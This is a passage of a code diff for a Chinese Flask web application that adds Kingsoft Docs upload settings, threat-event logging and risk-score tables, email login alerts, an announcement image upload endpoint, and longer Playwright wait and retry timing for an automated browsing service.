cursor.execute("ALTER TABLE announcements ADD COLUMN image_url TEXT")
conn.commit()
print(" ✓ 添加 announcements.image_url 字段")
def _migrate_to_v17(conn):
"""迁移到版本17 - 金山文档上传配置与用户开关"""
cursor = conn.cursor()
cursor.execute("PRAGMA table_info(system_config)")
columns = [col[1] for col in cursor.fetchall()]
system_fields = [
("kdocs_enabled", "INTEGER DEFAULT 0"),
("kdocs_doc_url", "TEXT DEFAULT ''"),
("kdocs_default_unit", "TEXT DEFAULT ''"),
("kdocs_sheet_name", "TEXT DEFAULT ''"),
("kdocs_sheet_index", "INTEGER DEFAULT 0"),
("kdocs_unit_column", "TEXT DEFAULT 'A'"),
("kdocs_image_column", "TEXT DEFAULT 'D'"),
("kdocs_admin_notify_enabled", "INTEGER DEFAULT 0"),
("kdocs_admin_notify_email", "TEXT DEFAULT ''"),
]
for field, ddl in system_fields:
if field not in columns:
cursor.execute(f"ALTER TABLE system_config ADD COLUMN {field} {ddl}")
print(f" ✓ 添加 system_config.{field} 字段")
cursor.execute("PRAGMA table_info(users)")
columns = [col[1] for col in cursor.fetchall()]
user_fields = [
("kdocs_unit", "TEXT DEFAULT ''"),
("kdocs_auto_upload", "INTEGER DEFAULT 0"),
]
for field, ddl in user_fields:
if field not in columns:
cursor.execute(f"ALTER TABLE users ADD COLUMN {field} {ddl}")
print(f" ✓ 添加 users.{field} 字段")
conn.commit()
def _migrate_to_v18(conn):
"""迁移到版本18 - 金山文档上传:有效行范围配置"""
cursor = conn.cursor()
cursor.execute("PRAGMA table_info(system_config)")
columns = [col[1] for col in cursor.fetchall()]
if "kdocs_row_start" not in columns:
cursor.execute("ALTER TABLE system_config ADD COLUMN kdocs_row_start INTEGER DEFAULT 0")
print(" ✓ 添加 system_config.kdocs_row_start 字段")
if "kdocs_row_end" not in columns:
cursor.execute("ALTER TABLE system_config ADD COLUMN kdocs_row_end INTEGER DEFAULT 0")
print(" ✓ 添加 system_config.kdocs_row_end 字段")
conn.commit()

View File

@@ -33,6 +33,8 @@ def ensure_schema(conn) -> None:
email TEXT,
email_verified INTEGER DEFAULT 0,
email_notify_enabled INTEGER DEFAULT 1,
kdocs_unit TEXT DEFAULT '',
kdocs_auto_upload INTEGER DEFAULT 0,
status TEXT DEFAULT 'approved',
vip_expire_time TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
@@ -72,6 +74,101 @@ def ensure_schema(conn) -> None:
"""
)
# ==================== 安全防护:威胁检测相关表 ====================
# 威胁事件日志表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
threat_type TEXT NOT NULL,
score INTEGER NOT NULL DEFAULT 0,
rule TEXT,
field_name TEXT,
matched TEXT,
value_preview TEXT,
ip TEXT,
user_id INTEGER,
request_method TEXT,
request_path TEXT,
user_agent TEXT,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# IP风险评分表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_risk_scores (
ip TEXT PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
# 用户风险评分表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_risk_scores (
user_id INTEGER PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# IP黑名单表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_blacklist (
ip TEXT PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
# 用户黑名单表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# 威胁特征库表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_signatures (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT UNIQUE NOT NULL,
threat_type TEXT NOT NULL,
pattern TEXT NOT NULL,
pattern_type TEXT DEFAULT 'regex',
score INTEGER DEFAULT 0,
is_active INTEGER DEFAULT 1,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
# 账号表(关联用户)
cursor.execute(
"""
@@ -118,6 +215,17 @@ def ensure_schema(conn) -> None:
auto_approve_enabled INTEGER DEFAULT 0,
auto_approve_hourly_limit INTEGER DEFAULT 10,
auto_approve_vip_days INTEGER DEFAULT 7,
kdocs_enabled INTEGER DEFAULT 0,
kdocs_doc_url TEXT DEFAULT '',
kdocs_default_unit TEXT DEFAULT '',
kdocs_sheet_name TEXT DEFAULT '',
kdocs_sheet_index INTEGER DEFAULT 0,
kdocs_unit_column TEXT DEFAULT 'A',
kdocs_image_column TEXT DEFAULT 'D',
kdocs_admin_notify_enabled INTEGER DEFAULT 0,
kdocs_admin_notify_email TEXT DEFAULT '',
kdocs_row_start INTEGER DEFAULT 0,
kdocs_row_end INTEGER DEFAULT 0,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
@@ -144,21 +252,6 @@ def ensure_schema(conn) -> None:
"""
)
# 密码重置申请表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS password_reset_requests (
id INTEGER PRIMARY KEY AUTOINCREMENT,
user_id INTEGER NOT NULL,
new_password_hash TEXT NOT NULL,
status TEXT NOT NULL DEFAULT 'pending',
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
processed_at TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# 数据库版本表
cursor.execute(
"""
@@ -196,6 +289,7 @@ def ensure_schema(conn) -> None:
id INTEGER PRIMARY KEY AUTOINCREMENT,
title TEXT NOT NULL,
content TEXT NOT NULL,
image_url TEXT,
is_active INTEGER DEFAULT 1,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
@@ -271,6 +365,26 @@ def ensure_schema(conn) -> None:
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_fingerprints_user ON login_fingerprints(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_created_at ON threat_events(created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_ip ON threat_events(ip)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_user_id ON threat_events(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_type ON threat_events(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_score ON ip_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_updated_at ON ip_risk_scores(updated_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_score ON user_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_updated_at ON user_risk_scores(updated_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_active ON ip_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_expires ON ip_blacklist(expires_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_type ON threat_signatures(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_active ON threat_signatures(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_user_id ON accounts(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_username ON accounts(username)")
@@ -279,9 +393,6 @@ def ensure_schema(conn) -> None:
cursor.execute("CREATE INDEX IF NOT EXISTS idx_task_logs_created_at ON task_logs(created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_task_logs_user_date ON task_logs(user_id, created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_password_reset_status ON password_reset_requests(status)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_password_reset_user_id ON password_reset_requests(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_user_id ON bug_feedbacks(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_status ON bug_feedbacks(status)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_bug_feedbacks_created_at ON bug_feedbacks(created_at)")

View File

@@ -2,10 +2,12 @@
# -*- coding: utf-8 -*-
from __future__ import annotations
from datetime import timedelta
from typing import Any, Optional
from typing import Dict
import db_pool
from db.utils import get_cst_now_str
from db.utils import get_cst_now, get_cst_now_str
def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict[str, bool]:
@@ -74,3 +76,217 @@ def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict
conn.commit()
return {"new_device": new_device, "new_ip": new_ip}
def get_threat_events_count(hours: int = 24) -> int:
"""获取指定时间内的威胁事件数。"""
try:
hours_int = max(0, int(hours))
except Exception:
hours_int = 24
if hours_int <= 0:
return 0
start_time = (get_cst_now() - timedelta(hours=hours_int)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT COUNT(*) AS cnt FROM threat_events WHERE created_at >= ?", (start_time,))
row = cursor.fetchone()
try:
return int(row["cnt"] if row else 0)
except Exception:
return 0
def _build_threat_events_where_clause(filters: Optional[dict]) -> tuple[str, list[Any]]:
clauses: list[str] = []
params: list[Any] = []
if not isinstance(filters, dict):
return "", []
event_type = filters.get("event_type") or filters.get("threat_type")
if event_type:
raw = str(event_type).strip()
types = [t.strip()[:64] for t in raw.split(",") if t.strip()]
if len(types) == 1:
clauses.append("threat_type = ?")
params.append(types[0])
elif types:
placeholders = ", ".join(["?"] * len(types))
clauses.append(f"threat_type IN ({placeholders})")
params.extend(types)
severity = filters.get("severity")
if severity is not None and str(severity).strip():
sev = str(severity).strip().lower()
if "-" in sev:
parts = [p.strip() for p in sev.split("-", 1)]
try:
min_score = int(parts[0])
max_score = int(parts[1])
clauses.append("score >= ? AND score <= ?")
params.extend([min_score, max_score])
except Exception:
pass
elif sev.isdigit():
clauses.append("score >= ?")
params.append(int(sev))
elif sev in {"high", "critical"}:
clauses.append("score >= ?")
params.append(80)
elif sev in {"medium", "med"}:
clauses.append("score >= ? AND score < ?")
params.extend([50, 80])
elif sev in {"low", "info"}:
clauses.append("score < ?")
params.append(50)
ip = filters.get("ip")
if ip is not None and str(ip).strip():
ip_text = str(ip).strip()[:64]
clauses.append("ip = ?")
params.append(ip_text)
user_id = filters.get("user_id")
if user_id is not None and str(user_id).strip():
try:
user_id_int = int(user_id)
except Exception:
user_id_int = None
if user_id_int is not None:
clauses.append("user_id = ?")
params.append(user_id_int)
if not clauses:
return "", []
return " WHERE " + " AND ".join(clauses), params
def get_threat_events_list(page: int, per_page: int, filters: Optional[dict] = None) -> dict:
"""分页获取威胁事件。"""
try:
page_i = max(1, int(page))
except Exception:
page_i = 1
try:
per_page_i = int(per_page)
except Exception:
per_page_i = 20
per_page_i = max(1, min(200, per_page_i))
where_sql, params = _build_threat_events_where_clause(filters)
offset = (page_i - 1) * per_page_i
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(f"SELECT COUNT(*) AS cnt FROM threat_events{where_sql}", tuple(params))
row = cursor.fetchone()
total = int(row["cnt"]) if row else 0
cursor.execute(
f"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
{where_sql}
ORDER BY created_at DESC, id DESC
LIMIT ? OFFSET ?
""",
tuple(params + [per_page_i, offset]),
)
items = [dict(r) for r in cursor.fetchall()]
return {"page": page_i, "per_page": per_page_i, "total": total, "items": items, "filters": filters or {}}
def get_ip_threat_history(ip: str, limit: int = 50) -> list[dict]:
"""获取IP的威胁历史最近limit条"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return []
try:
limit_i = max(1, min(200, int(limit)))
except Exception:
limit_i = 50
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
WHERE ip = ?
ORDER BY created_at DESC, id DESC
LIMIT ?
""",
(ip_text, limit_i),
)
return [dict(r) for r in cursor.fetchall()]
def get_user_threat_history(user_id: int, limit: int = 50) -> list[dict]:
"""获取用户的威胁历史最近limit条"""
if user_id is None:
return []
try:
user_id_int = int(user_id)
except Exception:
return []
try:
limit_i = max(1, min(200, int(limit)))
except Exception:
limit_i = 50
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT
id,
threat_type,
score,
rule,
field_name,
matched,
value_preview,
ip,
user_id,
request_method,
request_path,
user_agent,
created_at
FROM threat_events
WHERE user_id = ?
ORDER BY created_at DESC, id DESC
LIMIT ?
""",
(user_id_int, limit_i),
)
return [dict(r) for r in cursor.fetchall()]

View File

@@ -217,6 +217,39 @@ def get_user_by_id(user_id):
return dict(user) if user else None
def get_user_kdocs_settings(user_id):
"""获取用户的金山文档配置"""
user = get_user_by_id(user_id)
if not user:
return None
return {
"kdocs_unit": user.get("kdocs_unit") or "",
"kdocs_auto_upload": 1 if user.get("kdocs_auto_upload") else 0,
}
def update_user_kdocs_settings(user_id, *, kdocs_unit=None, kdocs_auto_upload=None) -> bool:
"""更新用户的金山文档配置"""
updates = []
params = []
if kdocs_unit is not None:
updates.append("kdocs_unit = ?")
params.append(kdocs_unit)
if kdocs_auto_upload is not None:
updates.append("kdocs_auto_upload = ?")
params.append(kdocs_auto_upload)
if not updates:
return False
params.append(user_id)
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(f"UPDATE users SET {', '.join(updates)} WHERE id = ?", params)
conn.commit()
return cursor.rowcount > 0
def get_user_by_username(username):
"""根据用户名获取用户"""
with db_pool.get_db() as conn:

View File

@@ -7,60 +7,48 @@ services:
ports:
- "51232:51233"
volumes:
- ./data:/app/data # 数据库持久化
- ./logs:/app/logs # 日志持久化
- ./截图:/app/截图 # 截图持久化
- ./playwright:/ms-playwright # Playwright浏览器持久化避免重复下载
- /etc/localtime:/etc/localtime:ro # 时区同步
- ./static:/app/static # 静态文件(实时更新)
- ./templates:/app/templates # 模板文件(实时更新)
- ./app.py:/app/app.py # 主程序(实时更新)
- ./database.py:/app/database.py # 数据库模块(实时更新)
- ./data:/app/data
- ./logs:/app/logs
- ./截图:/app/截图
- ./playwright:/ms-playwright
- /etc/localtime:/etc/localtime:ro
- ./static:/app/static
- ./templates:/app/templates
- ./app.py:/app/app.py
- ./database.py:/app/database.py
# 代码热更新
- ./services:/app/services
- ./routes:/app/routes
- ./db:/app/db
- ./security:/app/security
- ./realtime:/app/realtime
- ./api_browser.py:/app/api_browser.py
- ./app_config.py:/app/app_config.py
- ./app_logger.py:/app/app_logger.py
- ./app_security.py:/app/app_security.py
- ./browser_pool_worker.py:/app/browser_pool_worker.py
- ./crypto_utils.py:/app/crypto_utils.py
- ./db_pool.py:/app/db_pool.py
- ./email_service.py:/app/email_service.py
- ./password_utils.py:/app/password_utils.py
- ./playwright_automation.py:/app/playwright_automation.py
- ./task_checkpoint.py:/app/task_checkpoint.py
dns:
- 223.5.5.5
- 114.114.114.114
- 119.29.29.29
environment:
- TZ=Asia/Shanghai
- PYTHONUNBUFFERED=1
- PLAYWRIGHT_BROWSERS_PATH=/ms-playwright
- PLAYWRIGHT_DOWNLOAD_HOST=https://npmmirror.com/mirrors/playwright
# Flask 配置
- FLASK_ENV=production
- FLASK_DEBUG=false
# 服务器配置
- SERVER_HOST=0.0.0.0
- SERVER_PORT=51233
# 数据库配置
- DB_FILE=data/app_data.db
- DB_POOL_SIZE=5
# 并发控制配置
- MAX_CONCURRENT_GLOBAL=2
- MAX_CONCURRENT_PER_ACCOUNT=1
- MAX_CONCURRENT_CONTEXTS=100
# 安全配置
- SESSION_LIFETIME_HOURS=24
- SESSION_COOKIE_SECURE=false
- MAX_CAPTCHA_ATTEMPTS=5
- MAX_IP_ATTEMPTS_PER_HOUR=10
# 日志配置
- LOG_LEVEL=INFO
- LOG_FILE=logs/app.log
- API_DIAGNOSTIC_LOG=0
- API_DIAGNOSTIC_SLOW_MS=0
# 知识管理平台配置
- ZSGL_LOGIN_URL=https://postoa.aidunsoft.com/admin/login.aspx
- ZSGL_INDEX_URL_PATTERN=index.aspx
- PAGE_LOAD_TIMEOUT=60000
restart: unless-stopped
shm_size: 2gb # 为Chromium分配共享内存
# 内存和CPU资源限制
mem_limit: 4g # 硬限制:最大4GB内存
mem_reservation: 2g # 软限制:预留2GB
cpus: '2.0' # 限制使用2个CPU核心
# 健康检查(可选)
shm_size: 2gb
mem_limit: 4g
mem_reservation: 2g
cpus: '2.0'
healthcheck:
test: ["CMD-SHELL", "curl -f http://localhost:51233 || exit 1"]
interval: 5m

View File

@@ -154,6 +154,7 @@ def init_email_tables():
enabled INTEGER DEFAULT 0,
failover_enabled INTEGER DEFAULT 1,
register_verify_enabled INTEGER DEFAULT 0,
login_alert_enabled INTEGER DEFAULT 1,
task_notify_enabled INTEGER DEFAULT 0,
base_url TEXT DEFAULT '',
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
@@ -244,8 +245,8 @@ def get_email_settings() -> Dict[str, Any]:
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("""
SELECT enabled, failover_enabled, register_verify_enabled, base_url,
task_notify_enabled, updated_at
SELECT enabled, failover_enabled, register_verify_enabled, login_alert_enabled,
base_url, task_notify_enabled, updated_at
FROM email_settings WHERE id = 1
""")
row = cursor.fetchone()
@@ -254,14 +255,16 @@ def get_email_settings() -> Dict[str, Any]:
'enabled': bool(row[0]),
'failover_enabled': bool(row[1]),
'register_verify_enabled': bool(row[2]) if row[2] is not None else False,
'base_url': row[3] or '',
'task_notify_enabled': bool(row[4]) if row[4] is not None else False,
'updated_at': row[5]
'login_alert_enabled': bool(row[3]) if row[3] is not None else True,
'base_url': row[4] or '',
'task_notify_enabled': bool(row[5]) if row[5] is not None else False,
'updated_at': row[6]
}
return {
'enabled': False,
'failover_enabled': True,
'register_verify_enabled': False,
'login_alert_enabled': True,
'base_url': '',
'task_notify_enabled': False,
'updated_at': None
@@ -272,6 +275,7 @@ def update_email_settings(
enabled: bool,
failover_enabled: bool,
register_verify_enabled: bool = None,
login_alert_enabled: bool = None,
base_url: str = None,
task_notify_enabled: bool = None
) -> bool:
@@ -287,6 +291,10 @@ def update_email_settings(
updates.append('register_verify_enabled = ?')
params.append(int(register_verify_enabled))
if login_alert_enabled is not None:
updates.append('login_alert_enabled = ?')
params.append(int(login_alert_enabled))
if base_url is not None:
updates.append('base_url = ?')
params.append(base_url)

View File

@@ -424,7 +424,7 @@ class PlaywrightAutomation:
# 等待跳转
# self.log("等待登录处理...") # 精简日志
self.page.wait_for_load_state('networkidle', timeout=10000) # 优化为10秒
self.page.wait_for_load_state('networkidle', timeout=30000) # 增加到30秒
# 检查登录结果
current_url = self.page.url
@@ -823,7 +823,7 @@ class PlaywrightAutomation:
self.log(f"导航到 '{browse_type}' 页面...")
try:
# 等待页面完全加载
time.sleep(0.5)
time.sleep(2)
self.log(f"当前URL: {self.main_page.url}")
except Exception as e:
self.log(f"获取URL失败: {str(e)}")
@@ -835,7 +835,7 @@ class PlaywrightAutomation:
# 如果只是导航(用于截图),切换完成后直接返回
if navigate_only:
time.sleep(0.3) # 等待页面稳定
time.sleep(1) # 等待页面稳定
result.success = True
return result
@@ -867,21 +867,27 @@ class PlaywrightAutomation:
except Exception: # Bug fix: 明确捕获Exception
self.log("等待表格超时,继续尝试...")
# 等待页面网络空闲确保AJAX加载完成
try:
self.page.wait_for_load_state('networkidle', timeout=5000)
except Exception:
pass # 超时继续,不阻塞
# 额外等待确保AJAX内容加载完成
# 第一页等待更长时间因为是首次加载并发时尤其<E5B0A4><E585B6><EFBFBD>
if current_page == 1 and total_items == 0:
time.sleep(3.0)
else:
time.sleep(1.0)
# 获取内容行数量(简化重试2次快速检测
# 获取内容行数量(带重试机制避免AJAX加载慢导致误判
# 第一页使用更多重试次数8次×3秒=24秒处理高并发时的慢加载
# 后续页使用3次×1.5秒=4.5秒
max_retries = 8 if (current_page == 1 and total_items == 0) else 3
retry_wait = 3.0 if (current_page == 1 and total_items == 0) else 1.5
rows_count = 0
for retry in range(2):
for retry in range(max_retries):
rows_locator = self.page.locator("//table[@class='ltable']/tbody/tr[position()>1 and count(td)>=5]")
rows_count = rows_locator.count()
if rows_count > 0:
break
if retry == 0:
time.sleep(0.5) # 仅重试一次等待0.5秒
if retry < max_retries - 1:
self.log(f"未检测到内容,等待后重试... ({retry+1}/{max_retries})")
time.sleep(retry_wait)
if rows_count == 0:
self.log("当前页面没有内容")

View File

@@ -2,7 +2,6 @@ flask==3.0.0
flask-socketio==5.3.5
flask-login==0.6.3
python-socketio==5.10.0
playwright==1.40.0
schedule==1.2.0
psutil==5.9.6
pytz==2024.1
@@ -10,6 +9,6 @@ bcrypt==4.0.1
requests==2.31.0
python-dotenv==1.0.0
beautifulsoup4==4.12.2
nest_asyncio
cryptography>=41.0.0
Pillow>=10.0.0
playwright==1.42.0

View File

@@ -5,6 +5,7 @@ from __future__ import annotations
def register_blueprints(app) -> None:
from routes.admin_api import admin_api_bp
from routes.admin_api import security_bp as admin_security_bp
from routes.api_accounts import api_accounts_bp
from routes.api_auth import api_auth_bp
from routes.api_schedules import api_schedules_bp
@@ -21,3 +22,6 @@ def register_blueprints(app) -> None:
app.register_blueprint(api_screenshots_bp)
app.register_blueprint(api_schedules_bp)
app.register_blueprint(admin_api_bp)
# Security admin APIs (support both /api/admin/* and /yuyx/api/admin/*)
app.register_blueprint(admin_security_bp)
app.register_blueprint(admin_security_bp, url_prefix="/yuyx", name="admin_security_yuyx")

View File

@@ -8,4 +8,6 @@ admin_api_bp = Blueprint("admin_api", __name__, url_prefix="/yuyx/api")
# Import side effects: register routes on blueprint
from routes.admin_api import core as _core # noqa: F401
from routes.admin_api import update as _update # noqa: F401
# Export security blueprint for app registration
from routes.admin_api.security import security_bp # noqa: F401

View File

@@ -3,6 +3,8 @@
from __future__ import annotations
import os
import posixpath
import secrets
import threading
import time
from datetime import datetime
@@ -15,7 +17,9 @@ from app_logger import get_logger
from app_security import (
get_rate_limit_ip,
is_safe_outbound_url,
is_safe_path,
require_ip_not_locked,
sanitize_filename,
validate_email,
validate_password,
)
@@ -48,6 +52,36 @@ from services.time_utils import BEIJING_TZ, get_beijing_now
logger = get_logger("app")
config = get_config()
_server_cpu_percent_lock = threading.Lock()
_server_cpu_percent_last: float | None = None
_server_cpu_percent_last_ts = 0.0
def _get_server_cpu_percent() -> float:
import psutil
global _server_cpu_percent_last, _server_cpu_percent_last_ts
now = time.time()
with _server_cpu_percent_lock:
if _server_cpu_percent_last is not None and (now - _server_cpu_percent_last_ts) < 0.5:
return _server_cpu_percent_last
try:
if _server_cpu_percent_last is None:
cpu_percent = float(psutil.cpu_percent(interval=0.1))
else:
cpu_percent = float(psutil.cpu_percent(interval=None))
except Exception:
cpu_percent = float(_server_cpu_percent_last or 0.0)
if cpu_percent < 0:
cpu_percent = 0.0
_server_cpu_percent_last = cpu_percent
_server_cpu_percent_last_ts = now
return cpu_percent
def _admin_reauth_required() -> bool:
try:
@@ -61,6 +95,24 @@ def _require_admin_reauth():
return jsonify({"error": "需要二次确认", "code": "reauth_required"}), 401
return None
def _get_upload_dir():
rel_dir = getattr(config, "ANNOUNCEMENT_IMAGE_DIR", "static/announcements")
if not is_safe_path(current_app.root_path, rel_dir):
rel_dir = "static/announcements"
abs_dir = os.path.join(current_app.root_path, rel_dir)
os.makedirs(abs_dir, exist_ok=True)
return abs_dir, rel_dir
def _get_file_size(file_storage):
try:
file_storage.stream.seek(0, os.SEEK_END)
size = file_storage.stream.tell()
file_storage.stream.seek(0)
return size
except Exception:
return None
@admin_api_bp.route("/debug-config", methods=["GET"])
@admin_required
@@ -199,6 +251,42 @@ def admin_reauth():
# ==================== 公告管理API管理员 ====================
@admin_api_bp.route("/announcements/upload_image", methods=["POST"])
@admin_required
def admin_upload_announcement_image():
"""上传公告图片返回可访问URL"""
file = request.files.get("file")
if not file or not file.filename:
return jsonify({"error": "请选择图片"}), 400
filename = sanitize_filename(file.filename)
ext = os.path.splitext(filename)[1].lower()
allowed_exts = getattr(config, "ALLOWED_ANNOUNCEMENT_IMAGE_EXTENSIONS", {".png", ".jpg", ".jpeg"})
if not ext or ext not in allowed_exts:
return jsonify({"error": "不支持的图片格式"}), 400
if file.mimetype and not str(file.mimetype).startswith("image/"):
return jsonify({"error": "文件类型无效"}), 400
size = _get_file_size(file)
max_size = int(getattr(config, "MAX_ANNOUNCEMENT_IMAGE_SIZE", 5 * 1024 * 1024))
if size is not None and size > max_size:
max_mb = max_size // 1024 // 1024
return jsonify({"error": f"图片大小不能超过{max_mb}MB"}), 400
abs_dir, rel_dir = _get_upload_dir()
token = secrets.token_hex(6)
name = f"announcement_{int(time.time())}_{token}{ext}"
save_path = os.path.join(abs_dir, name)
file.save(save_path)
static_root = os.path.join(current_app.root_path, "static")
rel_to_static = os.path.relpath(abs_dir, static_root)
if rel_to_static.startswith(".."):
rel_to_static = "announcements"
url_path = posixpath.join(rel_to_static.replace(os.sep, "/"), name)
return jsonify({"success": True, "url": url_for("serve_static", filename=url_path)})
@admin_api_bp.route("/announcements", methods=["GET"])
@admin_required
def admin_get_announcements():
@@ -221,9 +309,13 @@ def admin_create_announcement():
data = request.json or {}
title = (data.get("title") or "").strip()
content = (data.get("content") or "").strip()
image_url = (data.get("image_url") or "").strip()
is_active = bool(data.get("is_active", True))
announcement_id = database.create_announcement(title, content, is_active=is_active)
if image_url and len(image_url) > 1000:
return jsonify({"error": "图片地址过长"}), 400
announcement_id = database.create_announcement(title, content, image_url=image_url, is_active=is_active)
if not announcement_id:
return jsonify({"error": "标题和内容不能为空"}), 400
@@ -317,6 +409,71 @@ def get_system_stats():
return jsonify(stats)
@admin_api_bp.route("/browser_pool/stats", methods=["GET"])
@admin_required
def get_browser_pool_stats():
"""获取截图线程池状态"""
try:
from browser_pool_worker import get_browser_worker_pool
pool = get_browser_worker_pool()
stats = pool.get_stats() or {}
worker_details = []
for w in stats.get("workers") or []:
last_ts = float(w.get("last_active_ts") or 0)
last_active_at = None
if last_ts > 0:
try:
last_active_at = datetime.fromtimestamp(last_ts, tz=BEIJING_TZ).strftime("%Y-%m-%d %H:%M:%S")
except Exception:
last_active_at = None
created_ts = w.get("browser_created_at")
created_at = None
if created_ts:
try:
created_at = datetime.fromtimestamp(float(created_ts), tz=BEIJING_TZ).strftime("%Y-%m-%d %H:%M:%S")
except Exception:
created_at = None
worker_details.append(
{
"worker_id": w.get("worker_id"),
"idle": bool(w.get("idle")),
"has_browser": bool(w.get("has_browser")),
"total_tasks": int(w.get("total_tasks") or 0),
"failed_tasks": int(w.get("failed_tasks") or 0),
"browser_use_count": int(w.get("browser_use_count") or 0),
"browser_created_at": created_at,
"browser_created_ts": created_ts,
"last_active_at": last_active_at,
"last_active_ts": last_ts,
"thread_alive": bool(w.get("thread_alive")),
}
)
total_workers = len(worker_details) if worker_details else int(stats.get("pool_size") or 0)
return jsonify(
{
"total_workers": total_workers,
"active_workers": int(stats.get("busy_workers") or 0),
"idle_workers": int(stats.get("idle_workers") or 0),
"queue_size": int(stats.get("queue_size") or 0),
"workers": worker_details,
"summary": {
"total_tasks": int(stats.get("total_tasks") or 0),
"failed_tasks": int(stats.get("failed_tasks") or 0),
"success_rate": stats.get("success_rate"),
},
"server_time_cst": get_beijing_now().strftime("%Y-%m-%d %H:%M:%S"),
}
)
except Exception as e:
logger.exception(f"[AdminAPI] 获取截图线程池状态失败: {e}")
return jsonify({"error": "获取截图线程池状态失败"}), 500
@admin_api_bp.route("/docker_stats", methods=["GET"])
@admin_required
def get_docker_stats():
@@ -510,9 +667,21 @@ def update_system_config_api():
schedule_weekdays = data.get("schedule_weekdays")
new_max_concurrent_per_account = data.get("max_concurrent_per_account")
new_max_screenshot_concurrent = data.get("max_screenshot_concurrent")
enable_screenshot = data.get("enable_screenshot")
auto_approve_enabled = data.get("auto_approve_enabled")
auto_approve_hourly_limit = data.get("auto_approve_hourly_limit")
auto_approve_vip_days = data.get("auto_approve_vip_days")
kdocs_enabled = data.get("kdocs_enabled")
kdocs_doc_url = data.get("kdocs_doc_url")
kdocs_default_unit = data.get("kdocs_default_unit")
kdocs_sheet_name = data.get("kdocs_sheet_name")
kdocs_sheet_index = data.get("kdocs_sheet_index")
